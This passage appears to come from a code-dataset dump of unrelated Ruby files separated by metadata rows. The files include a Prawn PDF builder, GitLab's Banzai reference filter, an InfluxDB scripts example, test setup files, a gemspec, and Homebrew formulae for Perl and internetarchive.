"one two three"
end
end
end
end
| 24.786667 | 115 | 0.56213 |
28c9e4a1f4ddd03a6ed1118b453eff1b7337cfb4 | 1,260 | require "prawn"
class SnapApplicationExtraMemberPdf
def initialize(members:, attributes_class:, title:)
@members = members
@attributes_class = attributes_class
@title = title
end
def completed_file
pdf = Prawn::Document.new
pdf.bounding_box([40, pdf.cursor - 40], width: 500, height: 600) do
pdf.font("Helvetica", size: 16) do
pdf.text(title)
end
pdf.move_down 10
members.each do |member|
attributes = attributes_class.new(member: member)
pdf.font("Helvetica", size: 14) do
pdf.text(attributes.title)
end
attributes.to_a.each do |attribute|
pdf.text(attribute)
end
pdf.move_down 10
end
end
add_footer(pdf)
pdf.render_file(temp_file.path)
temp_file
end
private
attr_reader :members, :attributes_class, :title
def temp_file
@_temp_file ||= Tempfile.new(["snap-extra-member", ".pdf"], "tmp/")
end
def add_footer(pdf)
pdf.page_count.times do |i|
pdf.go_to_page i
pdf.image(
footer_filename,
position: :center,
vposition: :bottom,
width: 500,
)
end
end
def footer_filename
"#{Rails.root}/public/pdf_footer.jpg"
end
end
| 19.6875 | 71 | 0.621429 |
7a262dd025ce0555351fe5cc44166536f1c8d418 | 9,522 | module Banzai
module Filter
# Issues, Merge Requests, Snippets, Commits and Commit Ranges share
# similar functionality in reference filtering.
class AbstractReferenceFilter < ReferenceFilter
include CrossProjectReference
def self.object_class
# Implement in child class
# Example: MergeRequest
end
def self.object_name
@object_name ||= object_class.name.underscore
end
def self.object_sym
@object_sym ||= object_name.to_sym
end
# Public: Find references in text (like `!123` for merge requests)
#
# AnyReferenceFilter.references_in(text) do |match, id, project_ref, matches|
# object = find_object(project_ref, id)
# "<a href=...>#{object.to_reference}</a>"
# end
#
# text - String text to search.
#
# Yields the String match, the Integer referenced object ID, an optional String
# of the external project reference, and all of the matchdata.
#
# Returns a String replaced with the return of the block.
def self.references_in(text, pattern = object_class.reference_pattern)
text.gsub(pattern) do |match|
symbol = $~[object_sym]
if object_class.reference_valid?(symbol)
yield match, symbol.to_i, $~[:project], $~[:namespace], $~
else
match
end
end
end
def object_class
self.class.object_class
end
def object_sym
self.class.object_sym
end
def references_in(*args, &block)
self.class.references_in(*args, &block)
end
def find_object(project, id)
# Implement in child class
# Example: project.merge_requests.find
end
def find_object_cached(project, id)
if RequestStore.active?
cache = find_objects_cache[object_class][project.id]
get_or_set_cache(cache, id) { find_object(project, id) }
else
find_object(project, id)
end
end
def project_from_ref_cached(ref)
if RequestStore.active?
cache = project_refs_cache
get_or_set_cache(cache, ref) { project_from_ref(ref) }
else
project_from_ref(ref)
end
end
def url_for_object(object, project)
# Implement in child class
# Example: project_merge_request_url
end
def url_for_object_cached(object, project)
if RequestStore.active?
cache = url_for_object_cache[object_class][project.id]
get_or_set_cache(cache, object) { url_for_object(object, project) }
else
url_for_object(object, project)
end
end
def call
return doc if project.nil?
ref_pattern = object_class.reference_pattern
link_pattern = object_class.link_reference_pattern
nodes.each do |node|
if text_node?(node) && ref_pattern
replace_text_when_pattern_matches(node, ref_pattern) do |content|
object_link_filter(content, ref_pattern)
end
elsif element_node?(node)
yield_valid_link(node) do |link, inner_html|
if ref_pattern && link =~ /\A#{ref_pattern}\z/
replace_link_node_with_href(node, link) do
object_link_filter(link, ref_pattern, link_content: inner_html)
end
next
end
next unless link_pattern
if link == inner_html && inner_html =~ /\A#{link_pattern}/
replace_link_node_with_text(node, link) do
object_link_filter(inner_html, link_pattern)
end
next
end
if link =~ /\A#{link_pattern}\z/
replace_link_node_with_href(node, link) do
object_link_filter(link, link_pattern, link_content: inner_html)
end
next
end
end
end
end
doc
end
# Replace references (like `!123` for merge requests) in text with links
# to the referenced object's details page.
#
# text - String text to replace references in.
# pattern - Reference pattern to match against.
# link_content - Original content of the link being replaced.
#
# Returns a String with references replaced with links. All links
# have `gfm` and `gfm-OBJECT_NAME` class names attached for styling.
def object_link_filter(text, pattern, link_content: nil)
references_in(text, pattern) do |match, id, project_ref, namespace_ref, matches|
project_path = full_project_path(namespace_ref, project_ref)
project = project_from_ref_cached(project_path)
if project && object = find_object_cached(project, id)
title = object_link_title(object)
klass = reference_class(object_sym)
data = data_attributes_for(link_content || match, project, object, link: !!link_content)
url =
if matches.names.include?("url") && matches[:url]
matches[:url]
else
url_for_object_cached(object, project)
end
content = link_content || object_link_text(object, matches)
%(<a href="#{url}" #{data}
title="#{escape_once(title)}"
class="#{klass}">#{content}</a>)
else
match
end
end
end
def data_attributes_for(text, project, object, link: false)
data_attribute(
original: text,
link: link,
project: project.id,
object_sym => object.id
)
end
def object_link_text_extras(object, matches)
extras = []
if matches.names.include?("anchor") && matches[:anchor] && matches[:anchor] =~ /\A\#note_(\d+)\z/
extras << "comment #{$1}"
end
extras
end
def object_link_title(object)
object.title
end
def object_link_text(object, matches)
text = object.reference_link_text(context[:project])
extras = object_link_text_extras(object, matches)
text += " (#{extras.join(", ")})" if extras.any?
text
end
# Returns a Hash containing all object references (e.g. issue IDs) per the
# project they belong to.
def references_per_project
@references_per_project ||= begin
refs = Hash.new { |hash, key| hash[key] = Set.new }
regex = Regexp.union(object_class.reference_pattern, object_class.link_reference_pattern)
nodes.each do |node|
node.to_html.scan(regex) do
project_path = full_project_path($~[:namespace], $~[:project])
symbol = $~[object_sym]
refs[project_path] << symbol if object_class.reference_valid?(symbol)
end
end
refs
end
end
# Returns a Hash containing referenced projects grouped per their full
# path.
def projects_per_reference
@projects_per_reference ||= begin
refs = Set.new
references_per_project.each do |project_ref, _|
refs << project_ref
end
find_projects_for_paths(refs.to_a).index_by(&:full_path)
end
end
def projects_relation_for_paths(paths)
Project.where_full_path_in(paths).includes(:namespace)
end
# Returns projects for the given paths.
def find_projects_for_paths(paths)
if RequestStore.active?
cache = project_refs_cache
to_query = paths - cache.keys
unless to_query.empty?
projects = projects_relation_for_paths(to_query)
found = []
projects.each do |project|
ref = project.path_with_namespace
get_or_set_cache(cache, ref) { project }
found << ref
end
not_found = to_query - found
not_found.each do |ref|
get_or_set_cache(cache, ref) { nil }
end
end
cache.slice(*paths).values.compact
else
projects_relation_for_paths(paths)
end
end
def current_project_path
@current_project_path ||= project.path_with_namespace
end
def current_project_namespace_path
@current_project_namespace_path ||= project.namespace.full_path
end
private
def full_project_path(namespace, project_ref)
return current_project_path unless project_ref
namespace_ref = namespace || current_project_namespace_path
"#{namespace_ref}/#{project_ref}"
end
def project_refs_cache
RequestStore[:banzai_project_refs] ||= {}
end
def find_objects_cache
RequestStore[:banzai_find_objects_cache] ||= Hash.new do |hash, key|
hash[key] = Hash.new { |h, k| h[k] = {} }
end
end
def url_for_object_cache
RequestStore[:banzai_url_for_object] ||= Hash.new do |hash, key|
hash[key] = Hash.new { |h, k| h[k] = {} }
end
end
def get_or_set_cache(cache, key)
if cache.key?(key)
cache[key]
else
value = yield
cache[key] = value if key.present?
value
end
end
end
end
end
| 29.388889 | 105 | 0.588322 |
e88339408e95e0ed58e2c4d30706fbe78a7aadaf | 124 | class EducationSerializer < ActiveModel::Serializer
attributes :id, :school, :location, :startDate, :endDate, :degree
end
| 31 | 67 | 0.774194 |
2689da79e778ef00037ceac1e3e5f583d3f85178 | 2,951 | $LOAD_PATH.unshift File.expand_path('../lib', __dir__)
require 'influxdb-client'
# warning: Invokable Scripts are supported only in InfluxDB Cloud, currently there is no support in InfluxDB OSS.
url = 'https://us-west-2-1.aws.cloud2.influxdata.com'
token = '...'
bucket = '...'
org = '...'
client = InfluxDB2::Client.new(url, token, bucket: bucket, org: org, precision: InfluxDB2::WritePrecision::NANOSECOND)
unique_id = Time.now.utc.to_i.to_s
#
# Prepare data
#
point1 = InfluxDB2::Point.new(name: 'my_measurement')
.add_tag('location', 'Prague')
.add_field('temperature', 25.3)
point2 = InfluxDB2::Point.new(name: 'my_measurement')
.add_tag('location', 'New York')
.add_field('temperature', 24.3)
client.create_write_api.write(data: [point1, point2])
scripts_api = client.create_invokable_scripts_api
#
# Create Invokable Script
#
puts "------- Create -------\n"
script_query = 'from(bucket: params.bucket_name) |> range(start: -30d) |> limit(n:2)'
create_request = InfluxDB2::ScriptCreateRequest.new(name: "my_script_#{unique_id}",
description: 'my first try',
language: InfluxDB2::ScriptLanguage::FLUX,
script: script_query)
created_script = scripts_api.create_script(create_request)
puts created_script.inspect
#
# Update Invokable Script
#
puts "------- Update -------\n"
update_request = InfluxDB2::ScriptUpdateRequest.new(description: 'my updated description')
created_script = scripts_api.update_script(created_script.id, update_request)
puts created_script.inspect
#
# Invoke a script
#
# FluxTables
puts "\n------- Invoke to FluxTables -------\n"
tables = scripts_api.invoke_script(created_script.id, params: { 'bucket_name' => bucket })
tables.each do |_, table|
table.records.each do |record|
puts "#{record.time} #{record.values['location']}: #{record.field} #{record.value}"
end
end
# Stream of FluxRecords
puts "\n------- Invoke to Stream of FluxRecords -------\n"
records = scripts_api.invoke_script_stream(created_script.id, params: { 'bucket_name' => bucket })
records.each do |record|
puts "#{record.time} #{record.values['location']}: #{record.field} #{record.value}"
end
# RAW
puts "\n------- Invoke to Raw-------\n"
raw = scripts_api.invoke_script_raw(created_script.id, params: { 'bucket_name' => bucket })
puts "RAW output:\n #{raw}"
#
# List scripts
#
puts "\n------- List -------\n"
scripts = scripts_api.find_scripts
scripts.each do |script|
puts " ---\n ID: #{script.id}\n Name: #{script.name}\n Description: #{script.description}"
end
puts '---'
#
# Delete previously created Script
#
puts "------- Delete -------\n"
scripts_api.delete_script(created_script.id)
puts " Successfully deleted script: '#{created_script.name}'"
client.close!
| 32.428571 | 118 | 0.648594 |
28026191219a37dffcd63d109599100581257a08 | 1,325 | if RUBY_VERSION < "1.9"
$stderr.puts "Sorry, Cucumber features are only meant to run on Ruby 1.9+ :("
exit 0
end
require 'bundler'
Bundler.setup
require 'aruba/cucumber'
require 'aruba/jruby' if RUBY_ENGINE == 'jruby'
require 'capybara/cucumber'
require 'minitest/autorun'
require 'phantomjs/poltergeist'
# Fake rack app for capybara that just returns the latest coverage report from aruba temp project dir
Capybara.app = lambda { |env|
request_path = env['REQUEST_PATH'] || '/'
request_path = '/index.html' if request_path == '/'
[200, {'Content-Type' => 'text/html'},
[File.read(File.join(File.dirname(__FILE__), '../../tmp/aruba/project/coverage', request_path))]]
}
Capybara.default_driver = Capybara.javascript_driver = :poltergeist
Before do
# JRuby takes it's time... See https://github.com/cucumber/aruba/issues/134
@aruba_timeout_seconds = RUBY_ENGINE == 'jruby' ? 60 : 20
this_dir = File.dirname(__FILE__)
# Clean up and create blank state for fake project
in_current_dir do
FileUtils.rm_rf 'project'
FileUtils.cp_r File.join(this_dir, '../../test/faked_project/'), 'project'
end
step 'I cd to "project"'
end
# Workaround for https://github.com/cucumber/aruba/pull/125
Aruba.configure do |config|
config.before_cmd do
set_env('JRUBY_OPTS', '-X-C --1.9')
end
end
| 28.804348 | 101 | 0.713962 |
61250b0ff991cdde82dc1a1ffcbf8ba315fe9fe8 | 1,388 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: drama_castings
#
# id :integer not null, primary key
# locale :string not null, indexed => [drama_character_id, person_id]
# notes :string
# created_at :datetime
# updated_at :datetime
# drama_character_id :integer not null, indexed => [person_id, locale], indexed
# licensor_id :integer
# person_id :integer not null, indexed => [drama_character_id, locale], indexed
#
# Indexes
#
# index_drama_castings_on_character_person_locale (drama_character_id,person_id,locale) UNIQUE
# index_drama_castings_on_drama_character_id (drama_character_id)
# index_drama_castings_on_person_id (person_id)
#
# Foreign Keys
#
# fk_rails_13a6ca2d95 (person_id => people.id)
# fk_rails_25f32514ae (drama_character_id => drama_characters.id)
# fk_rails_aef2c89cbe (licensor_id => producers.id)
#
# rubocop:enable Metrics/LineLength
require 'rails_helper'
RSpec.describe DramaCasting, type: :model do
it { should belong_to(:drama_character).required }
it { should belong_to(:person).required }
it { should belong_to(:licensor).class_name('Producer') }
it { should validate_length_of(:locale).is_at_most(20) }
it { should validate_length_of(:notes).is_at_most(140) }
end
| 36.526316 | 98 | 0.695245 |
387d53dea3914fcc8beb5c703bc7a029f5578507 | 467 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'hayrick'
require 'sequel'
require 'database_cleaner'
require_relative 'support/database_setup'
require_relative 'support/helpers'
RSpec.configure do |config|
config.include Helpers
config.before(:suite) do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with(:truncation)
end
config.around(:each) do |example|
DatabaseCleaner.cleaning { example.run }
end
end
| 22.238095 | 58 | 0.762313 |
ffe7f7657e10f865a1f1af9cf1040d140bb31d8d | 3,298 | class Perl < Formula
desc "Highly capable, feature-rich programming language"
homepage "https://www.perl.org/"
url "https://www.cpan.org/src/5.0/perl-5.34.0.tar.xz"
sha256 "82c2e5e5c71b0e10487a80d79140469ab1f8056349ca8545140a224dbbed7ded"
license any_of: ["Artistic-1.0-Perl", "GPL-1.0-or-later"]
head "https://github.com/perl/perl5.git", branch: "blead"
livecheck do
url "https://www.cpan.org/src/"
regex(/href=.*?perl[._-]v?(\d+\.\d*[02468](?:\.\d+)*)\.t/i)
end
bottle do
sha256 arm64_big_sur: "8b55cc95c9de8bdcf628ae6d6f631057952fa8b0218da8ac61eafe4da65a8761"
sha256 big_sur: "5f86afbccd065524f92080bd7f35ffe6398b7dd40a8fef6f0a2a7982fd276dae"
sha256 catalina: "de0127c56612bbadc3621217b586571cab897c001344b7a1d63302a4f8f74a8e"
sha256 mojave: "2222c3f09bdcd10640720d2f52ba71e09408ead129bc77853b2fdf88fc381061"
sha256 x86_64_linux: "ade369d066b93925bced51ad47be64743969283e9e0c88fb3de2c58bfddbacee" # linuxbrew-core
end
depends_on "berkeley-db"
depends_on "gdbm"
uses_from_macos "expat"
# Prevent site_perl directories from being removed
skip_clean "lib/perl5/site_perl"
def install
args = %W[
-des
-Dprefix=#{prefix}
-Dprivlib=#{lib}/perl5/#{version}
-Dsitelib=#{lib}/perl5/site_perl/#{version}
-Dotherlibdirs=#{HOMEBREW_PREFIX}/lib/perl5/site_perl/#{version}
-Dperlpath=#{opt_bin}/perl
-Dstartperl=#!#{opt_bin}/perl
-Dman1dir=#{man1}
-Dman3dir=#{man3}
-Duseshrplib
-Duselargefiles
-Dusethreads
]
on_macos do
args << "-Dsed=/usr/bin/sed"
end
args << "-Dusedevel" if build.head?
system "./Configure", *args
system "make"
system "make", "install"
# expose libperl.so to ensure we aren't using a brewed executable
# but a system library
if OS.linux?
perl_core = Pathname.new(`#{bin/"perl"} -MConfig -e 'print $Config{archlib}'`)+"CORE"
lib.install_symlink perl_core/"libperl.so"
end
end
def post_install
on_linux do
perl_archlib = Utils.safe_popen_read("perl", "-MConfig", "-e", "print $Config{archlib}")
perl_core = Pathname.new(perl_archlib)/"CORE"
if File.readlines("#{perl_core}/perl.h").grep(/include <xlocale.h>/).any? &&
(OS::Linux::Glibc.system_version >= "2.26" ||
(Formula["glibc"].any_version_installed? && Formula["glibc"].version >= "2.26"))
# Glibc does not provide the xlocale.h file since version 2.26
# Patch the perl.h file to be able to use perl on newer versions.
# locale.h includes xlocale.h if the latter one exists
inreplace "#{perl_core}/perl.h", "include <xlocale.h>", "include <locale.h>"
end
end
end
def caveats
<<~EOS
By default non-brewed cpan modules are installed to the Cellar. If you wish
for your modules to persist across updates we recommend using `local::lib`.
You can set that up like this:
PERL_MM_OPT="INSTALL_BASE=$HOME/perl5" cpan local::lib
echo 'eval "$(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib=$HOME/perl5)"' >> #{shell_profile}
EOS
end
test do
(testpath/"test.pl").write "print 'Perl is not an acronym, but JAPH is a Perl acronym!';"
system "#{bin}/perl", "test.pl"
end
end
| 34.715789 | 109 | 0.671316 |
01df9934ea334d0a2b65d874f92ea9363d312825 | 279 | # frozen_string_literal: true
module OrkaAPI
class Client
# The version of this gem.
VERSION = "0.1.0"
# The Orka API version this gem supports. Support for other versions is not guaranteed, in particular older
# versions.
API_VERSION = "1.7.0"
end
end
| 21.461538 | 111 | 0.691756 |
f76fff4d2f319d6a082ef52c685c958c2b0fa3ce | 76 | require 'spec_helper_acceptance'
# Ensure DCCP is disabled - Section 3.5.1
| 19 | 41 | 0.776316 |
ed39872a6f94c48b97bfa63543bccef4489779f7 | 1,312 | require 'spec_helper'
describe Arachni::Framework::Parts::Plugin do
include_examples 'framework'
describe '#plugins' do
it 'provides access to the plugin manager' do
expect(subject.plugins.is_a?( Arachni::Plugin::Manager )).to be_truthy
expect(subject.plugins.available.sort).to eq(
%w(wait bad with_options distributable loop default suspendable).sort
)
end
end
describe '#list_plugins' do
it 'returns info on all plugins' do
expect(subject.list_plugins.size).to eq(subject.plugins.available.size)
info = subject.list_plugins.find { |p| p[:options].any? }
plugin = subject.plugins[info[:shortname]]
plugin.info.each do |k, v|
if k == :author
expect(info[k]).to eq([v].flatten)
next
end
expect(info[k]).to eq(v)
end
expect(info[:shortname]).to eq(plugin.shortname)
end
context 'when a pattern is given' do
it 'uses it to filter out plugins that do not match it' do
subject.list_plugins( 'bad|foo' ).size == 2
subject.list_plugins( 'boo' ).size == 0
end
end
end
end
| 30.511628 | 85 | 0.55564 |
ed97ab0fce8847133da500714522fbea31bc1cac | 4,105 | # Run `rake sinatra-contrib.gemspec` to update the gemspec.
Gem::Specification.new do |s|
s.name = "sinatra-contrib"
s.version = "1.4.0"
s.description = "Collection of useful Sinatra extensions"
s.homepage = "http://github.com/sinatra/sinatra-contrib"
s.summary = s.description
# generated from git shortlog -sn
s.authors = [
"Konstantin Haase",
"Gabriel Andretta",
"Nicolas Sanguinetti",
"Eliot Shepard",
"Andrew Crump",
"Matt Lyon",
"undr"
]
# generated from git shortlog -sne
s.email = [
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]"
]
# generated from git ls-files
s.files = [
"LICENSE",
"README.md",
"Rakefile",
"ideas.md",
"lib/sinatra/capture.rb",
"lib/sinatra/config_file.rb",
"lib/sinatra/content_for.rb",
"lib/sinatra/contrib.rb",
"lib/sinatra/contrib/all.rb",
"lib/sinatra/contrib/setup.rb",
"lib/sinatra/contrib/version.rb",
"lib/sinatra/cookies.rb",
"lib/sinatra/decompile.rb",
"lib/sinatra/engine_tracking.rb",
"lib/sinatra/extension.rb",
"lib/sinatra/json.rb",
"lib/sinatra/link_header.rb",
"lib/sinatra/multi_route.rb",
"lib/sinatra/namespace.rb",
"lib/sinatra/reloader.rb",
"lib/sinatra/respond_with.rb",
"lib/sinatra/streaming.rb",
"lib/sinatra/test_helpers.rb",
"sinatra-contrib.gemspec",
"spec/capture_spec.rb",
"spec/config_file/key_value.yml",
"spec/config_file/key_value.yml.erb",
"spec/config_file/key_value_override.yml",
"spec/config_file/missing_env.yml",
"spec/config_file/with_envs.yml",
"spec/config_file/with_nested_envs.yml",
"spec/config_file_spec.rb",
"spec/content_for/different_key.erb",
"spec/content_for/different_key.erubis",
"spec/content_for/different_key.haml",
"spec/content_for/different_key.slim",
"spec/content_for/layout.erb",
"spec/content_for/layout.erubis",
"spec/content_for/layout.haml",
"spec/content_for/layout.slim",
"spec/content_for/multiple_blocks.erb",
"spec/content_for/multiple_blocks.erubis",
"spec/content_for/multiple_blocks.haml",
"spec/content_for/multiple_blocks.slim",
"spec/content_for/multiple_yields.erb",
"spec/content_for/multiple_yields.erubis",
"spec/content_for/multiple_yields.haml",
"spec/content_for/multiple_yields.slim",
"spec/content_for/passes_values.erb",
"spec/content_for/passes_values.erubis",
"spec/content_for/passes_values.haml",
"spec/content_for/passes_values.slim",
"spec/content_for/same_key.erb",
"spec/content_for/same_key.erubis",
"spec/content_for/same_key.haml",
"spec/content_for/same_key.slim",
"spec/content_for/takes_values.erb",
"spec/content_for/takes_values.erubis",
"spec/content_for/takes_values.haml",
"spec/content_for/takes_values.slim",
"spec/content_for_spec.rb",
"spec/cookies_spec.rb",
"spec/decompile_spec.rb",
"spec/extension_spec.rb",
"spec/json_spec.rb",
"spec/link_header_spec.rb",
"spec/multi_route_spec.rb",
"spec/namespace/foo.erb",
"spec/namespace/nested/foo.erb",
"spec/namespace_spec.rb",
"spec/okjson.rb",
"spec/reloader/app.rb.erb",
"spec/reloader_spec.rb",
"spec/respond_with/bar.erb",
"spec/respond_with/bar.json.erb",
"spec/respond_with/foo.html.erb",
"spec/respond_with/not_html.sass",
"spec/respond_with_spec.rb",
"spec/spec_helper.rb",
"spec/streaming_spec.rb"
]
s.add_dependency "sinatra", "~> 1.4.0"
s.add_dependency "backports", ">= 2.0"
s.add_dependency "tilt", "~> 1.3"
s.add_dependency "rack-test"
s.add_dependency "rack-protection"
s.add_dependency "eventmachine"
s.add_development_dependency "rspec", "~> 2.3"
s.add_development_dependency "haml"
s.add_development_dependency "erubis"
s.add_development_dependency "slim"
s.add_development_dependency "rake"
end
| 32.070313 | 61 | 0.687942 |
ababc759df9380ceb1144a42b84fb588a985a5b4 | 2,999 | # frozen_string_literal: true
require "spid/saml2"
require "spid/sso"
require "spid/slo"
require "spid/rack"
require "spid/metadata"
require "spid/version"
require "spid/configuration"
require "spid/identity_provider_manager"
require "spid/synchronize_idp_metadata"
module Spid # :nodoc:
class UnknownAuthnComparisonMethodError < StandardError; end
class UnknownAuthnContextError < StandardError; end
class UnknownDigestMethodError < StandardError; end
class UnknownSignatureMethodError < StandardError; end
class UnknownAttributeFieldError < StandardError; end
class MissingAttributeServicesError < StandardError; end
class PrivateKeyTooShortError < StandardError; end
class CertificateNotBelongsToPKeyError < StandardError; end
EXACT_COMPARISON = :exact
MINIMUM_COMPARISON = :minimum
BETTER_COMPARISON = :better
MAXIMUM_COMPARISON = :maximum
BINDINGS_HTTP_POST = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
BINDINGS_HTTP_REDIRECT = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect"
COMPARISON_METHODS = [
EXACT_COMPARISON,
MINIMUM_COMPARISON,
BETTER_COMPARISON,
MAXIMUM_COMPARISON
].freeze
SHA256 = "http://www.w3.org/2001/04/xmlenc#sha256"
SHA384 = "http://www.w3.org/2001/04/xmldsig-more#sha384"
SHA512 = "http://www.w3.org/2001/04/xmlenc#sha512"
DIGEST_METHODS = [
SHA256,
SHA384,
SHA512
].freeze
RSA_SHA256 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"
RSA_SHA384 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha384"
RSA_SHA512 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha512"
SIGNATURE_METHODS = [
RSA_SHA256,
RSA_SHA384,
RSA_SHA512
].freeze
SIGNATURE_ALGORITHMS = {
SHA256 => OpenSSL::Digest::SHA256.new,
SHA384 => OpenSSL::Digest::SHA384.new,
SHA512 => OpenSSL::Digest::SHA512.new,
RSA_SHA256 => OpenSSL::Digest::SHA256.new,
RSA_SHA384 => OpenSSL::Digest::SHA384.new,
RSA_SHA512 => OpenSSL::Digest::SHA512.new
}.freeze
L1 = "https://www.spid.gov.it/SpidL1"
L2 = "https://www.spid.gov.it/SpidL2"
L3 = "https://www.spid.gov.it/SpidL3"
AUTHN_CONTEXTS = [
L1,
L2,
L3
].freeze
SUCCESS_CODE = "urn:oasis:names:tc:SAML:2.0:status:Success"
ATTRIBUTES_MAP = {
spid_code: "spidCode",
name: "name",
family_name: "familyName",
place_of_birth: "placeOfBirth",
date_of_birth: "dateOfBirth",
gender: "gender",
company_name: "companyName",
registered_office: "registeredOffice",
fiscal_number: "fiscalNumber",
iva_code: "ivaCode",
id_card: "idCard",
mobile_phone: "mobilePhone",
email: "email",
address: "address",
digital_address: "digitalAddress"
}.freeze
ATTRIBUTES = ATTRIBUTES_MAP.keys.freeze
class << self
attr_writer :configuration
end
def self.configuration
@configuration ||= Configuration.new
end
def self.reset_configuration!
@configuration = Configuration.new
end
def self.configure
yield configuration
end
end
| 26.078261 | 79 | 0.718906 |
ed29b26a540b44c5781ce7ac4680a5798f108ee3 | 1,404 | module I18n
module Sync
# Main class
class Work
attr_accessor :master, :debug
def initialize(master, opts = {})
@master = YamlFile.new(master)
say "Start work on #{master}"
end
def self.sync_dir(path, master, opts = {})
path ||= DEFAULT_LOCALE
fail "Path doesn't exist '#{path}'" unless File.exist?(path)
Dir["#{path}/**"].map do |file|
next unless file =~ /(^|\.)#{master}\./
new(file, opts)
end
end
def sync
master.siblings.each do |file|
say "Syncing #{file}"
other = YamlFile.new(file)
other.sync!(master)
other.write!
end
end
def add_key(key, value)
key.split('.').each do |key|
master.data[key] ||= {} .deep_sync
end
end
def create_new_files
@new_ones.each do |name|
say "Creating new file #{name}"
create name
end
end
def create(newlang)
# New name "app.en.yml" -> "app.pt.yml", "en.yml" -> "pt.yml"
newname = @file.gsub(/(^|\.)#{@lang}\./, "\\1#{newlang}.")
fullpath = "#{@path}/#{newname}"
return puts('File exists.') if File.exist?(fullpath)
write_file(fullpath, newlang, @comments, @words)
end
def say(txt)
puts txt # if debug
end
end
end
end
| 24.631579 | 70 | 0.510684 |
edb00c261187ac7474ca31d7963a6727391aafda | 1,660 | require 'rails_helper'
describe 'leagues/matches/index' do
let(:div) { build(:league_division) }
let(:home_team) { build_stubbed(:league_roster) }
let(:away_team) { build_stubbed(:league_roster) }
before do
@matches = []
@matches << build_stubbed(:league_match, home_team: home_team,
away_team: away_team, status: 'confirmed')
@matches << build_stubbed(:league_match, home_team: home_team, away_team: away_team,
status: 'pending', round_name: 'Finals')
@matches << build_stubbed(:bye_league_match, home_team: home_team, status: 'confirmed')
League::Match.forfeit_bies.each_key do |ff|
@matches << build_stubbed(:league_match, home_team: home_team, away_team: away_team,
forfeit_by: ff, status: 'confirmed')
end
rounds = []
rounds << build_stubbed(:league_match_round, home_team_score: 2, away_team_score: 1)
rounds << build_stubbed(:league_match_round, home_team_score: 1, away_team_score: 2)
rounds << build_stubbed(:league_match_round, home_team_score: 3, away_team_score: 3)
@matches.each do |match|
allow(match).to receive(:rounds).and_return(rounds)
end
end
it 'displays matches' do
allow(view).to receive(:user_can_edit_league?).and_return(true)
assign(:league, div.league)
assign(:divisions, [div])
assign(:matches, div => @matches)
render
@matches.each do |match|
expect(rendered).to include(match.home_team.name)
expect(rendered).to include(match.away_team.name) if match.away_team
end
end
end
| 38.604651 | 91 | 0.656024 |
1d29285cd76f4a849df38523a56da784e40c2aa2 | 388 | ActiveRecord::QueryMethods.module_eval do
def bind_parameters(opts)
binds = []
opts.each do |(column, value)|
if(value.nil?)
raise ArgumentError.new("nils are not allowed in bind parameter. please sanitize value for column: '#{column}'")
end
binds.push [@klass.columns_hash[column.to_s], value]
end
self.bind_values += binds
self
end
end
| 27.714286 | 120 | 0.667526 |
edce0ceeb056ef3668296d7942a77e9597ce16a9 | 1,310 | require 'renewable/version'
module Renewable
def initialize(attributes = {}, options = {})
attributes, options = process_arguments(attributes.dup, options.dup)
renewable_process_attributes(attributes)
renewable_process_options(options)
attributes, options = before_freeze(attributes, options)
self.freeze
after_freeze(attributes, options)
end
def renew(attributes = {}, options = {})
merged_attributes = self.renewable_attributes.merge(attributes)
merged_options = self.renewable_options.merge(options)
self.class.new(merged_attributes, merged_options)
end
protected
def renewable_attributes
@renewable_attributes
end
def renewable_options
@renewable_options
end
private
def process_arguments(attributes, options)
return attributes, options
end
def renewable_process_attributes(attributes)
attributes.each do |name, value|
self.instance_variable_set(:"@#{name}", value)
end
@renewable_attributes = attributes
end
def renewable_process_options(options)
@renewable_options = options
end
def before_freeze(attributes, options)
return attributes, options
end
def after_freeze(attributes, options)
return attributes, options
end
end
class Renewable::Object
include ::Renewable
end
| 21.833333 | 72 | 0.748092 |
d5eef7d266c81d95e3540488122b2eac8e767b85 | 4,386 | class Internetarchive < Formula
include Language::Python::Virtualenv
desc "Python wrapper for the various Internet Archive APIs"
homepage "https://github.com/jjjake/internetarchive"
url "https://files.pythonhosted.org/packages/9f/30/edd23ef4968ac86f587ec7d152887e8005ee9ca7e058fe2c90c38157274e/internetarchive-2.1.0.tar.gz"
sha256 "72094f05df39bb1463f61f928f3a7fa0dd236cab185cb8b7e8eb6c85e09acdc4"
license "AGPL-3.0-or-later"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "86c1ea4cd264073a6ff29d9c9be67707feefa99f756bdad5c8ff1c5998e29834"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "efd1f32bcd50639dcae68284c1f9341fd5dd3954864f950187bb51ee8ff3066a"
sha256 cellar: :any_skip_relocation, monterey: "3c4434db045fc01960fa40d8f8e5c8868100b07dabaddf021157c88cbc855e45"
sha256 cellar: :any_skip_relocation, big_sur: "fb46971f8737f8df3fd581d34165a485655daa35677d7b2d23ed8a98ca518be3"
sha256 cellar: :any_skip_relocation, catalina: "3452cddfc926f50ab193f97d008f13aa8857f42688bf829994eb80521b84ed8e"
sha256 cellar: :any_skip_relocation, mojave: "34976cd4bc110ba7043355db9d70e78d36863cdab96023dd87c096fa33b60f7c"
sha256 cellar: :any_skip_relocation, x86_64_linux: "ed7f2477545d884241f11c6ebb2a6f7be9a01d7f419c9c29237d79418554cc83"
end
depends_on "[email protected]"
depends_on "six"
resource "certifi" do
url "https://files.pythonhosted.org/packages/6d/78/f8db8d57f520a54f0b8a438319c342c61c22759d8f9a1cd2e2180b5e5ea9/certifi-2021.5.30.tar.gz"
sha256 "2bbf76fd432960138b3ef6dda3dde0544f27cbf8546c458e60baf371917ba9ee"
end
resource "charset-normalizer" do
url "https://files.pythonhosted.org/packages/e7/4e/2af0238001648ded297fb54ceb425ca26faa15b341b4fac5371d3938666e/charset-normalizer-2.0.4.tar.gz"
sha256 "f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3"
end
resource "contextlib2" do
